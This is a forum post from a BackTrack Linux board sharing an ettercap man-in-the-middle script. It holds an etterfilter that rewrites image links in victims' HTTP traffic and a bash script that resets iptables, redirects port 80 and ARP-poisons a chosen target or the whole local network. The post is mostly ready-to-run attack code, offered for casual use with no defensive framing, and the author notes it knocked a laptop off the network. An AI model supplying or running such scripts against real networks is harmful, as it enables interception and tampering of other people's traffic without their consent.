Ettercap MiTM image replacement SCRIPT

**akuj1n** · 03-30-2011, 01:14 AM

I cant take credit for this, I simply took one of g0tmi1ks scripts (ssl strip/ettercap/urlsnarf) and whittled it down to a super simple image replacement script. So thanks to g0tmi1ks, so here it is.

preparation first! this is irongeeks image replacment script it has been updated from this original post on his blog, this filter is from the binary revolution forums.

Code:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

copy paste that into a text file, and of course replace the urls with whatever lovely images you would like

save this as something like fun.filter

now open a terminal and cd into the directory with the fun.filter and run this

Code:

etterfilter fun.filter -o fun.ef

this makes the filter into something ettercap can read and apply

now iptables and runnin the script

edit your etter.conf and uncomment the ip_tables area like normal

copy paste the following into a .txt file and save it as something like imagefun.sh

Code:

#!/bin/bash
    echo -n "What interface to use? ie wlan0: "
    read -e IFACE
    echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e ROUTER
    echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e VICTIM
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    ettercap -T -i $IFACE -F /root/ECfilters/new.ef -M arp:remote /$ROUTER/ /$VICTIM/ -P repoison_arp
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain

again you need to change the part of the ettercap line /root/ECfilters/new.ef to whatever path your filter is in. now run the script!

This performs MUCH faster for me than the gui based ettercap filtering, however I havent tested it much and it seems to DoS my gfs laptop when I arp the whole network so please edit and improve this script if you like it. Thanks

BackTrack Linux - Penetration Testing Distribution

Thread: Ettercap MiTM image replacement SCRIPT

Thread Tools

Search Thread

Display

Ettercap MiTM image replacement SCRIPT

Similar Threads

Another-other-other.... sslstrip mitm script

CAG-Script - Bash script to automate MITM's, deauth's, passive sniffing, etc

rogue AP + MITM (tutorial or script request)

MITM on TCP with ettercap.

Ettercap MITM

Tags for this Thread

Posting Permissions